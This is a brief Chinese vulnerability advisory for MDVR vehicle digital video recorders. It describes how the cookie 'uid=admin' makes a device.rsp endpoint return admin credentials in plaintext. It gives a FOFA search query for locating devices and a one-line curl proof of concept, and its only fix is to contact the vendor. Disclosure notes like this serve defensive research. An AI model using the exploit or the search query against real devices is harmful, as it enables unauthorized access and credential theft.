Nx01 产品简介

        MDVR（Mobile Digital Video Recorders）硬盘录像机是一种使用先进的视音频编解码技术将车内外的视频进行数模转换，进行压缩存储的设备。

Nx02 漏洞描述

        阿根廷研究员发现，通过使用“Cookie： uid = admin”的Cookie标头来访问特定DVR的控制面板，DVR将以明文形式响应设备的管理员凭证。

Nx03 产品主页

fofa-query: "MDVR"

Nx04 漏洞复现

POC：

curl "http://127.0.0.1/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Nx05 修复建议

建议联系软件厂商进行处理。